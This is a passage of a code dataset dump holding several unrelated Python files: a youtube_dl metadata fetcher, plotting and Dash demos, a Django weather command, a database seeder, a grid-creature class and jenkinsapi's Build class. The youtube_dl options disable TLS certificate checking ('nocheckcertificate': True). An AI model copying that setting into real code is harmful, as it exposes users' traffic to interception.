core.crud.sql.datasource import (\n get_one_youtube_url_and_youtube_uploader_by_youtube_url,\n)\nfrom core import youtube_com_cookies_path\nimport json\nfrom numpy import random\nimport traceback\n\n\ndef get_raw_youtube_info(youtube_url: str):\n ytdl_options = {\n # \"cachedir\": False,\n \"quiet\": True,\n \"nocheckcertificate\": True,\n \"restrictfilenames\": True,\n \"cookiefile\": youtube_com_cookies_path,\n }\n\n ydl = youtube_dl.YoutubeDL(ytdl_options)\n\n result = ydl.extract_info(\n youtube_url, download=False # We just want to extract the info\n )\n joy = json.dumps(result)\n print(joy)\n return joy\n\n\ndef get_raw_title_uploader_from_youtube_url(youtube_url: str):\n ytdl_options = {\n # \"cachedir\": False,\n \"quiet\": True,\n \"nocheckcertificate\": True,\n \"restrictfilenames\": True,\n \"cookiefile\": youtube_com_cookies_path,\n }\n\n try:\n ydl = youtube_dl.YoutubeDL(ytdl_options)\n\n result = ydl.extract_info(\n youtube_url, download=False # We just want to extract the info\n )\n youtube_info_result = {\n \"youtube_url\": youtube_url,\n \"uploader\": result.get(\"uploader\"),\n \"youtube_title\": result.get(\"title\"),\n \"duration\": result.get(\"duration\") * 1000,\n }\n except DownloadError as ex:\n youtube_info_result = {\n \"youtube_url\": youtube_url,\n \"uploader\": f\"{ex}\",\n \"youtube_title\": f\"{ex}\",\n \"duration\": f\"0\",\n }\n except: # noqa\n youtube_info_result = {\n \"youtube_url\": youtube_url,\n \"uploader\": \"Error: Unknown error\",\n \"youtube_title\": \"Error: Unknown error\",\n \"duration\": \"0\",\n }\n x = random.uniform(0.5, 3)\n time.sleep(x)\n # print(youtube_info_result)\n return youtube_info_result\n\n\ndef get_youtube_title_and_youtube_uploader_from_youtube_url(youtube_url: str):\n db_datasources = get_one_youtube_url_and_youtube_uploader_by_youtube_url(\n youtube_url\n )\n\n if not db_datasources:\n youtube_info_result = get_raw_title_uploader_from_youtube_url(youtube_url)\n else:\n\n for db_datasource in db_datasources:\n info = db_datasource.info.get(\"source\", None)\n youtube_title = info.get(\"title\", None)\n uploader = info.get(\"uploader\", None)\n duration = db_datasource.duration_ms\n youtube_info_result = {\n \"youtube_url\": youtube_url,\n \"uploader\": uploader,\n \"youtube_title\": youtube_title,\n \"duration\": duration,\n }\n print(youtube_info_result)\n return youtube_info_result\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n youtube_urls = [\"https://www.youtube.com/watch?v=pOWuBM2RNmI\"]\n for youtube_url in youtube_urls:\n print(youtube_url)\n # get_youtube_title_and_youtube_uploader_from_youtube_url(youtube_url)\n test = get_youtube_title_and_youtube_uploader_from_youtube_url(youtube_url)\n print(test)\n t2 = time.time() - start_time\n print(t2)\n","sub_path":"youtube_dl_fuction/fuctions.py","file_name":"fuctions.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601870918","text":"from pylab import *\nfrom matplotlib.colors import LogNorm\n\nconfusion1 = loadtxt('../training_data/test_confusion_part2.1.txt')\nconfusion2 = loadtxt('../training_data/test_confusion_part2.2.txt')\nconfusion3 = loadtxt('../training_data/test_confusion_svm.txt')\n\nconfusion1 = confusion1/np.sum(confusion1)\nconfusion2 = confusion2/np.sum(confusion2)\nconfusion3 = confusion3/np.sum(confusion3)\n\nrcParams['font.family'] = 'serif'\nrcParams['font.sans-serif'] = ['times']\nrcParams['font.size'] = 7\nf = figure(figsize=(5.55, 1.7))\nf.patch.set_facecolor('white')\n\nsubplot(131)\npcolor(confusion1.T, cmap='binary',\n norm=LogNorm(vmin=confusion1.min()+1e-3, vmax=confusion1.max()))\nxlabel('Prediction')\nylabel('Label')\ncolorbar()\nxticks(range(10))\nyticks(range(10))\ngca().annotate('(a)', xy=(0.016, 0.95),\n xycoords='figure fraction', fontsize='8')\n\nsubplot(132)\npcolor(confusion2.T, cmap='binary',\n norm=LogNorm(vmin=confusion1.min()+1e-3, vmax=confusion1.max()))\nxlabel('Prediction')\nylabel('Label')\ncolorbar()\nxticks(range(10))\nyticks(range(10))\ngca().annotate('(b)', xy=(0.34, 0.95),\n xycoords='figure fraction', fontsize='8')\n\nsubplot(133)\npcolor(confusion3.T, cmap='binary',\n norm=LogNorm(vmin=confusion1.min()+1e-3, vmax=confusion1.max()))\ncolorbar()\nxlabel('Prediction')\nylabel('Label')\nxticks(range(10))\nyticks(range(10))\ngca().annotate('(c)', xy=(0.67, 0.95),\n xycoords='figure fraction', fontsize='8')\n\ntight_layout()\nsavefig('Fig3.svg')","sub_path":"figures/plot_Fig3.py","file_name":"plot_Fig3.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"292583278","text":"# -*- coding: UTF-8 -*-\n\nimport json\n\nimport requests\nfrom django.core.management import BaseCommand, CommandError\nfrom django.conf import settings\n\nFORECAST_URL = settings.FORECAST_URL\nFORECAST_API_KEY = settings.FORECAST_API_KEY\n\nc = lambda k: round(k - 273.15, 1)\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument(\"city\", type=str)\n\n def handle(self, *args, **options):\n weather = requests.get(FORECAST_URL.format(\n options.get(\"city\"), FORECAST_API_KEY\n )).content\n data = json.loads(weather)\n if data[\"cod\"] == \"404\":\n raise CommandError(\"Unknown city\")\n temperature = data[\"main\"][\"temp\"]\n pressure = data[\"main\"][\"pressure\"]\n humidity = data[\"main\"][\"humidity\"]\n wind_speed = data[\"wind\"][\"speed\"]\n weather_desc = data[\"weather\"][0][\"description\"]\n self.stdout.write(\n self.style.SUCCESS(\n u\"{} / Температура : {} \"\n u\"/ Атмосферное давление : {} \"\n u\"/ Влажность : {} \"\n u\"/ Скорость ветра : {}\"\n ).format(\n weather_desc, c(temperature), pressure, humidity, wind_speed)\n )\n\n","sub_path":"attract_group/management/commands/get_weather.py","file_name":"get_weather.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"251822146","text":"# create_db.py\n\nfrom app import db\nfrom yaml import load, dump, CLoader as Loader, CDumper as Dumper\nfrom models import *\n\n# Create the database schema\ndb.create_all()\n\n# Add row if a match is not already present\ndef add_if_new(session, model, **kwargs):\n\tinstance = session.query(model).filter_by(**kwargs).first()\n\tif not instance:\n\t\tinstance = model(**kwargs)\n\t\tsession.add(instance)\n\t\tsession.commit()\n\n# Open the yaml file containing the default device types\nwith open('data_defaults.yaml') as file:\n\tdata_defaults = load(file, Loader=Loader)\n\n# Add device types to the database\nfor item in data_defaults['device_types']:\n\tadd_if_new(db.session, DeviceTypes, device_type=item)\n\n# Add connection methods to the database\nfor item in data_defaults['connect_methods']:\n\tadd_if_new(db.session, ConnectMethods, connect_method=item)\n","sub_path":"web/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"273756658","text":"\"\"\"\nThis module contains the Creature class.\n\nA creature has a score. A score at zero or below indicates\nthe creature is \"dead\".\n\nThe creature needs to know:\n* its score\n* its facing (N, E, S, W)\n* its grid size (width of world, height of world)\n* its start location (x, y) if you prefer\n* its start facing (N, E, S, W)\n* its current location (x, y)\n\"\"\"\n\n\nclass Creature:\n \n def __init__(self, init_score, world_size, start_location, init_facing='N'):\n \"\"\"\n Initialize a creature.\n \n Args:\n self: This object\n init_score: A number that gives the creature an initial score.\n A creature is only \"alive\" if it has a score greater than zero.\n world_size: A tuple or list that gives the creature information about the size \n of the world.\n The first entry in the pair should refer to the horizontal (x) dimension \n of the world.\n The second entry in the pair should refer to the vertical (y) dimension \n of the world.\n NOTE: The world's \"origin\" (0,0) coordinate is in the upper-left corner.\n start_location: A tuple or list that gives the creature an initial location within \n the world.\n Its value for each pair of coordinates should be 0 <= position < world_dim,\n where position and world dim refer to either the horizontal (x) or vertical (y)\n dimension of the world.\n init_facing: An initial facing.\n Facing is one of four values: N, E, S, W representing one of the four cardinal\n direction: (N)orth, (S)outh, (E)ast, or (W)est. Here, North points upward on \n the display; South downward; West to the left; and East to the right.\n \"\"\"\n self.score = init_score # Creatures are online \"alive\" if their score is > 0\n self.world_size = world_size # How big is our world (width, height)\n self.current_location = start_location # (x,y) position of creature\n self.facing = init_facing # N,E,S,W direction the creature is facing\n self.initial = [init_score, start_location, init_facing] # Backup for resetting\n \n def reset(self):\n \"\"\"\n Resets the creature to initial conditions.\n \n Args:\n self: This object\n \n Returns:\n None, but the creature is updated to initial conditons\n \"\"\"\n self.score = self.initial[0]\n self.current_location = self.initial[1]\n self.facing = self.initial[2]\n\n \n def is_alive(self):\n \"\"\"\n Checks to see if the creature is alive. A creature is only alive if its score \n is greater than zero.\n \n Args:\n self: This object\n \n Returns:\n a Boolean value True or False if the creature is alive.\n \"\"\"\n if self.score > 0:\n return True\n else:\n return False\n \n \n def kill(self):\n \"\"\"\n Kill the creature.\n \n Args:\n self: This object\n \n Returns:\n None, but will set the creature's score to 0 to kill it.\n \"\"\"\n self.score = 0\n \n \n \n def rotate_left(self):\n \"\"\"\n Rotates the creature's facing 90 degrees to the left. \n If a creature is facing north and it rotates\n 90 degrees to the left four times, the sequence of facings \n would be: N -> W -> S -> E -> N\n \n Args:\n self: This object\n \n Returns:\n None, but the creature is rotated.\n \"\"\"\n if self.facing == \"N\":\n self.facing = \"W\"\n elif self.facing == \"W\":\n self.facing = \"S\"\n elif self.facing == \"S\":\n self.facing = \"E\"\n elif self.facing == \"E\":\n self.facing = \"N\"\n else:\n raise Exception('Unknown direction present')\n \n \n def rotate_right(self):\n \"\"\"\n Rotates the creature's facing 90 degrees to the right. If a creature is \n facing north and it rotates 90 degrees to the right four times, \n the sequence of facings would be: N -> E -> S -> W -> N\n \n Args:\n self: This object\n \n Returns:\n None, but the creature is rotated.\n \"\"\"\n if self.facing == \"N\":\n self.facing = \"E\"\n elif self.facing == \"E\":\n self.facing = \"S\"\n elif self.facing == \"S\":\n self.facing = \"W\"\n elif self.facing == \"W\":\n self.facing = \"N\"\n else:\n raise Exception('Unknown direction present')\n \n \n \n def move_forward(self):\n \"\"\"\n Changes the creature's current_location to move one unit in the direction \n the creature is facing. So, if a creature is facing North, it will move one \n unit *up*. Since the origin (0,0) cell of the world is in the upper-left corner, \n this would mean the creature's location in the y-dimension is decreased by one unit.\n \n NOTES:\n * The origin is in the upper-left corner. That means movement up and left \n decreases the value of the location coordinates; moving down or right \n increases them.\n \n * The world is finite sized. This means the creature *CANNOT* have a negative \n coordinate or a value greater-than or equal-to the world_size for any particular \n dimension. For exmaple, if the world size is (5,5), the creature can never have \n a current_location (5,2) or (2,5) because those would both be outside the \n dimensions of the world. (The highest value in any dimension in a 5x5 world \n would be 4.)\n \n * If a creature cannot move (e.g. it's at the edge of the world), then the creature \n will stay where it is presently located.\n \n * YOU WILL HAVE TO ENSURE THAT THE CREATURE DOES NOT MOVE INTO AN INVALID \n COORDINATE AS DESCRIBED ABOVE. The game will kill it otherwise. Or crash.\n \n Args:\n self: This object\n \n Returns:\n None, but the creature tries to move.\n \"\"\"\n loc = list(self.current_location)\n world = list(self.world_size)\n if self.facing == \"N\" and loc[1] > 0:\n loc[1] = loc[1] - 1\n elif self.facing == \"E\" and loc[0] < world[0] - 1:\n loc[0] = loc[0] + 1\n elif self.facing == \"W\" and loc[0] > 0:\n loc[0] = loc[0] - 1\n elif self.facing == \"S\" and loc[1] < world[1] - 1:\n loc[1] = loc[1] + 1\n else:\n self.score = 0\n \n self.current_location = tuple(loc)\n","sub_path":"exercises/04/PointyGame/creature.py","file_name":"creature.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"526418417","text":"\"\"\"\nTakes a .yml file with structure as follows:\n\n script: path/to/script/name.py\n config: path/to/yml/config.yml\n run_in: 'host' or 'container'\n num_gpus: how many gpus (default: 0)\n blocking: whether to block on this job or not (default: false)\n\nCould also be multiple jobs:\n parallelize: whether to parallelize each job (default: false)\n num_jobs: how many jobs to run in parallel (default: 1)\n\n jobs:\n - script: script1.py\n config: config1.yml\n - script: script2.py\n config: config2.yml\n ...\n\nThe jobs get executed one after the other.\n\"\"\"\nimport sys\nsys.path.insert(0, '.')\n\nfrom runners.utils import build_parser_for_yml_script, parse_yaml\nfrom runners.script_runner_pool import ScriptRunnerPool\nfrom cookiecutter_repo import logging\nfrom multiprocessing import cpu_count\n\ndef main(path_to_yml_file):\n spec = parse_yaml(path_to_yml_file)\n\n num_jobs = min(cpu_count(), spec.pop('num_jobs', 1))\n\n logging.info(\n f\"\\n Executing scripts with num_jobs: {num_jobs}\"\n )\n\n pool = ScriptRunnerPool(max_workers=num_jobs)\n pool.submit(spec['jobs'])\n\nif __name__ == \"__main__\":\n parser = build_parser_for_yml_script()\n args = vars(parser.parse_args())\n main(args['spec'])","sub_path":"{{cookiecutter.repo_name}}/scripts/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"243843842","text":"# -*- coding: utf-8 -*-\n#Dash imports\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n#External css style sheet\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\n#Main app\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n#App layout, it describes what the applications looks like\napp.layout = html.Div([\n dcc.Input(id='my-id', value='initial value', type='text'),\n html.Div(id='my-div')\n])\n\n#Callbacks for interactivity\n@app.callback(\n Output('my-div', 'children'),\n [Input('my-id', 'value')]\n)\ndef update_output_div(input_value):\n return 'You\\'ve entered \"{}\"'.format(input_value)\n\n#App server\nif __name__ == '__main__':\n app.run_server(debug=True)","sub_path":"Callbacks snippets/Input Text.py","file_name":"Input Text.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"189742986","text":"\"\"\"\nA Jenkins build represents a single execution of a Jenkins Job.\n\nBuilds can be thought of as the second level of the Jenkins hierarchy\nbeneath Jobs. Builds can have state, such as whether they are running or\nnot. They can also have outcomes, such as whether they passed or failed.\n\nBuild objects can be associated with Results and Artifacts.\n\"\"\"\nfrom __future__ import annotations\n\nimport time\nimport logging\nimport warnings\nimport datetime\n\nfrom time import sleep\nfrom typing import Iterator, List, Dict, Any\n\nimport pytz\nfrom jenkinsapi import config\nfrom jenkinsapi.artifact import Artifact\n\n# from jenkinsapi.job import Job\nfrom jenkinsapi.result_set import ResultSet\nfrom jenkinsapi.jenkinsbase import JenkinsBase\nfrom jenkinsapi.constants import STATUS_SUCCESS\nfrom jenkinsapi.custom_exceptions import NoResults\nfrom jenkinsapi.custom_exceptions import JenkinsAPIException\n\nfrom urllib.parse import quote\nfrom requests import HTTPError\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Build(JenkinsBase):\n\n \"\"\"\n Represents a Jenkins build, executed in context of a job.\n \"\"\"\n\n STR_TOTALCOUNT = \"totalCount\"\n STR_TPL_NOTESTS_ERR = (\n \"%s has status %s, and does not have \" \"any test results\"\n )\n\n def __init__(\n self, url: str, buildno: int, job: \"Job\", depth: int = 1\n ) -> None:\n \"\"\"\n depth=1 is for backward compatibility consideration\n\n About depth, the deeper it is, the more build data you get back. If\n depth=0 is sufficient for you, don't go up to 1. For more\n information, see\n https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-Depthcontrol\n \"\"\"\n self.buildno: int = buildno\n self.job: \"Job\" = job\n self.depth = depth\n JenkinsBase.__init__(self, url)\n\n def _poll(self, tree=None):\n # For builds we need more information for downstream and\n # upstream builds so we override the poll to get at the extra\n # data for build objects\n url = self.python_api_url(self.baseurl)\n return self.get_data(url, params={\"depth\": self.depth}, tree=tree)\n\n def __str__(self) -> str:\n return self._data[\"fullDisplayName\"]\n\n @property\n def name(self):\n return str(self)\n\n def get_description(self) -> str:\n return self._data[\"description\"]\n\n def get_number(self) -> int:\n return self._data[\"number\"]\n\n def get_status(self) -> str:\n return self._data[\"result\"]\n\n def get_slave(self) -> str:\n return self._data[\"builtOn\"]\n\n def get_revision(self) -> str:\n return getattr(self, f\"_get_{self._get_vcs()}_rev\", lambda: \"\")()\n\n def get_revision_branch(self) -> str:\n return getattr(\n self, f\"_get_{self._get_vcs()}_rev_branch\", lambda: \"\"\n )()\n\n def get_repo_url(self) -> str:\n return getattr(self, f\"_get_{self._get_vcs()}_repo_url\", lambda: \"\")()\n\n def get_params(self) -> dict[str, str]:\n \"\"\"\n Return a dictionary of params names and their values, or an\n empty dictionary if no parameters are returned.\n \"\"\"\n # This is what a parameter action looks like:\n # {'_class': 'hudson.model.ParametersAction', 'parameters': [\n # {'_class': 'hudson.model.StringParameterValue',\n # 'value': '12',\n # 'name': 'FOO_BAR_BAZ'}]}\n actions = self._data.get(\"actions\")\n if actions:\n parameters = {}\n for elem in actions:\n if elem.get(\"_class\") == \"hudson.model.ParametersAction\":\n parameters = elem.get(\"parameters\", {})\n break\n return {pair[\"name\"]: pair.get(\"value\") for pair in parameters}\n\n return {}\n\n def get_changeset_items(self):\n \"\"\"\n Returns a list of changeSet items.\n\n Each item has structure as in following example:\n {\n \"affectedPaths\": [\n \"content/rcm/v00-rcm-xccdf.xml\"\n ],\n \"author\" : {\n \"absoluteUrl\": \"http://jenkins_url/user/username79\",\n \"fullName\": \"username\"\n },\n \"commitId\": \"3097\",\n \"timestamp\": 1414398423091,\n \"date\": \"2014-10-27T08:27:03.091288Z\",\n \"msg\": \"commit message\",\n \"paths\": [{\n \"editType\": \"edit\",\n \"file\": \"/some/path/of/changed_file\"\n }],\n \"revision\": 3097,\n \"user\": \"username\"\n }\n \"\"\"\n if \"changeSet\" in self._data:\n if \"items\" in self._data[\"changeSet\"]:\n return self._data[\"changeSet\"][\"items\"]\n elif \"changeSets\" in self._data:\n if \"items\" in self._data[\"changeSets\"]:\n return self._data[\"changeSets\"][\"items\"]\n return []\n\n def _get_vcs(self) -> str:\n \"\"\"\n Returns a string VCS.\n By default, 'git' will be used.\n \"\"\"\n vcs = \"git\"\n if \"changeSet\" in self._data and \"kind\" in self._data[\"changeSet\"]:\n vcs = self._data[\"changeSet\"][\"kind\"] or \"git\"\n elif \"changeSets\" in self._data and \"kind\" in self._data[\"changeSets\"]:\n vcs = self._data[\"changeSets\"][\"kind\"] or \"git\"\n return vcs\n\n def _get_git_rev(self) -> str | None:\n # Sometimes we have None as part of actions. Filter those actions\n # which have lastBuiltRevision in them\n _actions = [\n x for x in self._data[\"actions\"] if x and \"lastBuiltRevision\" in x\n ]\n\n if _actions:\n return _actions[0][\"lastBuiltRevision\"][\"SHA1\"]\n\n return None\n\n def _get_git_rev_branch(self) -> str:\n # Sometimes we have None as part of actions. Filter those actions\n # which have lastBuiltRevision in them\n _actions = [\n x for x in self._data[\"actions\"] if x and \"lastBuiltRevision\" in x\n ]\n\n return _actions[0][\"lastBuiltRevision\"][\"branch\"]\n\n def _get_git_repo_url(self) -> str:\n # Sometimes we have None as part of actions. Filter those actions\n # which have lastBuiltRevision in them\n _actions = [\n x for x in self._data[\"actions\"] if x and \"lastBuiltRevision\" in x\n ]\n # old Jenkins version have key remoteUrl v/s the new version\n # has a list remoteUrls\n result = _actions[0].get(\"remoteUrls\", _actions[0].get(\"remoteUrl\"))\n if isinstance(result, list):\n result = \",\".join(result)\n return result\n\n def get_duration(self) -> datetime.timedelta:\n return datetime.timedelta(milliseconds=self._data[\"duration\"])\n\n def get_build_url(self) -> str:\n return self._data[\"url\"]\n\n def get_artifacts(self) -> Iterator[Artifact]:\n data = self.poll(tree=\"artifacts[relativePath,fileName]\")\n for afinfo in data[\"artifacts\"]:\n url = \"%s/artifact/%s\" % (\n self.baseurl,\n quote(afinfo[\"relativePath\"]),\n )\n af = Artifact(\n afinfo[\"fileName\"],\n url,\n self,\n relative_path=afinfo[\"relativePath\"],\n )\n yield af\n\n def get_artifact_dict(self) -> dict[str, Artifact]:\n return {af.relative_path: af for af in self.get_artifacts()}\n\n def get_upstream_job_name(self) -> str | None:\n \"\"\"\n Get the upstream job name if it exist, None otherwise\n :return: String or None\n \"\"\"\n try:\n return self.get_actions()[\"causes\"][0][\"upstreamProject\"]\n except KeyError:\n return None\n\n def get_upstream_job(self) -> Job | None:\n \"\"\"\n Get the upstream job object if it exist, None otherwise\n :return: Job or None\n \"\"\"\n if self.get_upstream_job_name():\n return self.get_jenkins_obj().get_job(self.get_upstream_job_name())\n return None\n\n def get_upstream_build_number(self) -> int | None:\n \"\"\"\n Get the upstream build number if it exist, None otherwise\n :return: int or None\n \"\"\"\n try:\n return int(self.get_actions()[\"causes\"][0][\"upstreamBuild\"])\n except KeyError:\n return None\n\n def get_upstream_build(self) -> \"Build\" | None:\n \"\"\"\n Get the upstream build if it exist, None otherwise\n :return Build or None\n \"\"\"\n upstream_job: \"Job\" = self.get_upstream_job()\n if upstream_job:\n return upstream_job.get_build(self.get_upstream_build_number())\n\n return None\n\n def get_master_job_name(self) -> str | None:\n \"\"\"\n Get the master job name if it exist, None otherwise\n :return: String or None\n \"\"\"\n try:\n return self.get_actions()[\"parameters\"][0][\"value\"]\n except KeyError:\n return None\n\n def get_master_job(self) -> Job | None:\n \"\"\"\n Get the master job object if it exist, None otherwise\n :return: Job or None\n \"\"\"\n if self.get_master_job_name():\n return self.get_jenkins_obj().get_job(self.get_master_job_name())\n\n return None\n\n def get_master_build_number(self) -> int | None:\n \"\"\"\n Get the master build number if it exist, None otherwise\n :return: int or None\n \"\"\"\n try:\n return int(self.get_actions()[\"parameters\"][1][\"value\"])\n except KeyError:\n return None\n\n def get_master_build(self) -> \"Build\" | None:\n \"\"\"\n Get the master build if it exist, None otherwise\n :return Build or None\n \"\"\"\n master_job: Job | None = self.get_master_job()\n if master_job:\n return master_job.get_build(self.get_master_build_number())\n\n return None\n\n def get_downstream_jobs(self) -> List[Job]:\n \"\"\"\n Get the downstream jobs for this build\n :return List of jobs or None\n \"\"\"\n downstream_jobs: List[Job] = []\n try:\n for job_name in self.get_downstream_job_names():\n downstream_jobs.append(\n self.get_jenkins_obj().get_job(job_name)\n )\n return downstream_jobs\n except (IndexError, KeyError):\n return []\n\n def get_downstream_job_names(self) -> List[str]:\n \"\"\"\n Get the downstream job names for this build\n :return List of string or None\n \"\"\"\n downstream_job_names: List[str] = self.job.get_downstream_job_names()\n downstream_names: List[str] = []\n try:\n fingerprints = self._data[\"fingerprint\"]\n for fingerprint in fingerprints:\n for job_usage in fingerprint[\"usage\"]:\n if job_usage[\"name\"] in downstream_job_names:\n downstream_names.append(job_usage[\"name\"])\n return downstream_names\n except (IndexError, KeyError):\n return []\n\n def get_downstream_builds(self) -> List[\"Build\"]:\n \"\"\"\n Get the downstream builds for this build\n :return List of Build or None\n \"\"\"\n downstream_job_names: List[str] = self.get_downstream_job_names()\n downstream_builds: List[Build] = []\n try: # pylint: disable=R1702\n fingerprints = self._data[\"fingerprint\"]\n for fingerprint in fingerprints:\n for job_usage in fingerprint[\"usage\"]:\n if job_usage[\"name\"] in downstream_job_names:\n job = self.get_jenkins_obj().get_job(job_usage[\"name\"])\n for job_range in job_usage[\"ranges\"][\"ranges\"]:\n for build_id in range(\n job_range[\"start\"], job_range[\"end\"]\n ):\n downstream_builds.append(\n job.get_build(build_id)\n )\n return downstream_builds\n except (IndexError, KeyError):\n return []\n\n def get_matrix_runs(self) -> Iterator[\"Build\"]:\n \"\"\"\n For a matrix job, get the individual builds for each\n matrix configuration\n :return: Generator of Build\n \"\"\"\n if \"runs\" in self._data:\n for rinfo in self._data[\"runs\"]:\n number: int = rinfo[\"number\"]\n if number == self._data[\"number\"]:\n yield Build(rinfo[\"url\"], number, self.job)\n\n def is_running(self) -> bool:\n \"\"\"\n Return a bool if running.\n \"\"\"\n data = self.poll(tree=\"building\")\n return data.get(\"building\", False)\n\n def block(self) -> None:\n while self.is_running():\n time.sleep(1)\n\n def is_good(self) -> bool:\n \"\"\"\n Return a bool, true if the build was good.\n If the build is still running, return False.\n \"\"\"\n return (not self.is_running()) and self._data[\n \"result\"\n ] == STATUS_SUCCESS\n\n def block_until_complete(self, delay: int = 15) -> None:\n count: int = 0\n while self.is_running():\n total_wait: int = delay * count\n log.info(\n msg=\"Waited %is for %s #%s to complete\"\n % (total_wait, self.job.name, self.name)\n )\n sleep(delay)\n count += 1\n\n def get_jenkins_obj(self) -> \"Jenkins\":\n return self.job.get_jenkins_obj()\n\n def get_result_url(self) -> str:\n \"\"\"\n Return the URL for the object which provides the job's result summary.\n \"\"\"\n url_tpl: str = r\"%stestReport/%s\"\n return url_tpl % (self._data[\"url\"], config.JENKINS_API)\n\n def get_resultset(self) -> ResultSet:\n \"\"\"\n Obtain detailed results for this build.\n\n Raises NoResults if the build has no results.\n\n :return: ResultSet\n \"\"\"\n result_url: str = self.get_result_url()\n if self.STR_TOTALCOUNT not in self.get_actions():\n raise NoResults(\n \"%s does not have any published results\" % str(self)\n )\n buildstatus: str = self.get_status()\n if not self.get_actions()[self.STR_TOTALCOUNT]:\n raise NoResults(\n self.STR_TPL_NOTESTS_ERR % (str(self), buildstatus)\n )\n return ResultSet(result_url, build=self)\n\n def has_resultset(self) -> bool:\n \"\"\"\n Return a boolean, true if a result set is available. false if not.\n \"\"\"\n return self.STR_TOTALCOUNT in self.get_actions()\n\n def get_actions(self) -> Dict[str, Any]:\n all_actions: Dict[str, Any] = {}\n for dct_action in self._data[\"actions\"]:\n if dct_action is None:\n continue\n all_actions.update(dct_action)\n return all_actions\n\n def get_causes(self) -> List[str]:\n \"\"\"\n Returns a list of causes. There can be multiple causes lists and\n some of the can be empty. For instance, when a build is manually\n aborted, Jenkins could add an empty causes list to the actions\n dict. Empty ones are ignored.\n \"\"\"\n all_causes: List[str] = []\n for dct_action in self._data[\"actions\"]:\n if dct_action is None:\n continue\n if \"causes\" in dct_action and dct_action[\"causes\"]:\n all_causes.extend(dct_action[\"causes\"])\n return all_causes\n\n def get_timestamp(self) -> datetime.datetime:\n \"\"\"\n Returns build timestamp in UTC\n \"\"\"\n # Java timestamps are given in miliseconds since the epoch start!\n naive_timestamp = datetime.datetime(\n *time.gmtime(self._data[\"timestamp\"] / 1000.0)[:6]\n )\n return pytz.utc.localize(naive_timestamp)\n\n def get_console(self) -> str:\n \"\"\"\n Return the current state of the text console.\n \"\"\"\n url: str = \"%s/consoleText\" % self.baseurl\n resp = self.job.jenkins.requester.get_url(url)\n content: Any = resp.content\n # This check was made for Python 3.x\n # In this version content is a bytes string\n # By contract this function must return string\n if isinstance(content, str):\n return content\n elif isinstance(content, bytes):\n return content.decode(resp.encoding or \"ISO-8859-1\")\n else:\n raise JenkinsAPIException(\"Unknown content type for console\")\n\n def stream_logs(self, interval=0) -> Iterator[str]:\n \"\"\"\n Return generator which streams parts of text console.\n \"\"\"\n url: str = \"%s/logText/progressiveText\" % self.baseurl\n size: int = 0\n more_data: bool = True\n while more_data:\n resp = self.job.jenkins.requester.get_url(\n url, params={\"start\": size}\n )\n content = resp.content\n if content:\n if isinstance(content, str):\n yield content\n elif isinstance(content, bytes):\n yield content.decode(resp.encoding or \"ISO-8859-1\")\n else:\n raise JenkinsAPIException(\n \"Unknown content type for console\"\n )\n size = resp.headers[\"X-Text-Size\"]\n more_data = resp.headers.get(\"X-More-Data\")\n sleep(interval)\n\n def get_estimated_duration(self) -> int | None:\n \"\"\"\n Return the estimated build duration (in seconds) or none.\n \"\"\"\n try:\n eta_ms = self._data[\"estimatedDuration\"]\n return max(0, eta_ms / 1000.0)\n except KeyError:\n return None\n\n def stop(self) -> bool:\n \"\"\"\n Stops the build execution if it's running\n :return boolean True if succeded False otherwise or the build\n is not running\n \"\"\"\n if self.is_running():\n url: str = \"%s/stop\" % self.baseurl\n # Starting from Jenkins 2.7 stop function sometimes breaks\n # on redirect to job page. Call to stop works fine, and\n # we don't need to have job page here.\n self.job.jenkins.requester.post_and_confirm_status(\n url,\n data=\"\",\n valid=[\n 302,\n 200,\n 500,\n ],\n )\n return True\n return False\n\n def get_env_vars(self) -> Dict[str, str]:\n \"\"\"\n Return the environment variables.\n\n This method is using the Environment Injector plugin:\n https://wiki.jenkins-ci.org/display/JENKINS/EnvInject+Plugin\n \"\"\"\n url: str = self.python_api_url(\"%s/injectedEnvVars\" % self.baseurl)\n try:\n data = self.get_data(url, params={\"depth\": self.depth})\n except HTTPError as ex:\n warnings.warn(\n \"Make sure the Environment Injector plugin is installed.\"\n )\n raise ex\n return data[\"envMap\"]\n\n def toggle_keep(self) -> None:\n \"\"\"\n Toggle \"keep this build forever\" on and off\n \"\"\"\n url: str = \"%s/toggleLogKeep\" % self.baseurl\n self.get_jenkins_obj().requester.post_and_confirm_status(url, data={})\n self._data = self._poll()\n\n def is_kept_forever(self) -> bool:\n return self._data[\"keepLog\"]\n","sub_path":"jenkinsapi/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":19467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"573891487","text":"import requests\n\nif __name__ == '__main__':\n #url = 'https://httpbin.org/get?nombre=visaka&curos=python'\n url = 'https://httpbin.org/get'\n args = {'nombre': 'visaka', 'cursos':'python', 'nivel':'intermedio'}\n response = requests.get(url, params=args)\n #print(response.url)\n\n if response.status_code == 200:\n content = response.content\n response_json = response.json()\n #print(response_json)\n\n origin = response_json['origin']\n print(origin)\n\n\n\n #Almacenar el contenido de la pagina web\n file = open('bin.html', 